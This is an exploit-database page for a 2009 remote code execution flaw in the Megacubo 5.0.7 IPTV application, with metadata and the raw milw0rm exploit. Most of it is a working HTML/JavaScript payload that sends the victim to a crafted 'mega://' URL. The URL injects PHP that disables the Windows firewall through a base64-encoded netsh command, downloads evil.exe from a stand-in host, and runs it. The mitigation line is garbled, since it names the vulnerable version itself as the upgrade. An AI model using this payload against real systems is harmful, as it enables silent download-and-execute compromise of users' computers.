header-logo
Suggest Exploit
vendor:
Megacubo
by:
JJunior
9.3
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Megacubo
Affected Version From: 5.0.7
Affected Version To: 5.0.7
Patch Exists: Yes
Related CWE: N/A
CPE: a:megacubo:megacubo:5.0.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3
2009

Megacubo 5.0.7 download & Execute

A vulnerability in Megacubo 5.0.7 allows remote attackers to execute arbitrary code by using a malicious URL. The vulnerability is due to the application's failure to properly validate user-supplied input. An attacker can exploit this vulnerability by enticing an unsuspecting user to click on a malicious URL. Successful exploitation could result in the execution of arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Megacubo 5.0.7
Source

Exploit-DB raw data:

Megacubo 5.0.7 download & Execute
by :JJunior
site: http://www.musicastop.com.br/

tested against Internet Explorer 7 and Mozilla Firefox  1.5  Windows Xp sp 3

software site: http://www.megacubo.net/tv/
download url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023
 
description:
"Megacubo is a IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows(2000,
XP and Vista)."
 
example exploit, download & Execute :
 

<html>
<head>
<title>MegaCubo - download & Execute</title>
<meta http-equiv="Content-Type" content="text/html; ">
</head>
<body>
<script>
// url download & exec code evil
evil = 'http://www.example.com/evil.exe';
 
// disable firewall  encode base_64
firewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';
 
shellcode = 'mega://play|con.."a()".system(base64_decode("'+firewall+'")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("'+evil+'")).system("C:/Megacubo.exe")."/?");print(';
 
// shell code
window.location=shellcode;

</script>
</body>
</html>

# milw0rm.com [2009-01-01]

Navigation

Suggest Exploit

Services By CQR